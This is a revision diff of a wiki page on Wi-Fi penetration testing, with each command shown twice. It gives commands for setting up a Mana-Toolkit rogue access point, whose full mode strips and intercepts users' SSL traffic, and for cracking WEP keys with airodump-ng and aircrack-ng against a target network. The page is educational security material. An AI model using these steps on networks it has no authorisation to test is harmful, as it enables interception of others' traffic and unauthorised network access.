Wifi: Penetration Testing: Difference between revisions

 
Line 85: Line 85:
# start-nat-simple: starts a regular AP using internet connection in upstream interface.
# start-nat-simple: starts a regular AP using internet connection in upstream interface.
# start-nat-full: starts AP with internet connection, it also starts sslstrip, sslsplit, firelamp and attempts to bypass HTST. <kbd>''<nowiki>{{Sometimes this script is not working}}</nowiki>''</kbd>
# start-nat-full: starts AP with internet connection, it also starts sslstrip, sslsplit, firelamp and attempts to bypass HTST. <kbd>''<nowiki>{{Sometimes this script is not working}}</nowiki>''</kbd>
<syntaxhighlight lang="bash">
## install Mana-Toolkit
> apt-get install mana-toolkit


## install Mana-Toolkit
## Modify configuration files
> apt-get install mana-toolkit
> vim /etc/mana-toolkit/hostapd-karma.conf
> vim /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
## Modify configuration files
 
> vim /etc/mana-toolkit/hostapd-karma.conf
# run the script
> vim /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
> bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
</syntaxhighlight>
# run the script
> bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh


== WEP Cracking ==
== WEP Cracking ==
Line 106: Line 107:


=== Simple WEP cracking (In case of a busy network with active users and high IV rate) ===
=== Simple WEP cracking (In case of a busy network with active users and high IV rate) ===
## Run airodump-ng to log all traffic from the target network
<syntaxhighlight lang="bash">
## airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
## Run airodump-ng to log all traffic from the target network
> airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0
## airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
> airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0
## At the same time we shall use aircrack-ng to try and crack the capture file created by the above command
 
> aircrack-ng out-01.cap
## At the same time we shall use aircrack-ng to try and crack the capture file created by the above command
> aircrack-ng out-01.cap
## Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IVs in out-01.cap is enough.
 
## Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IVs in out-01.cap is enough.
</syntaxhighlight>


=== Packet Injection ===
=== Packet Injection ===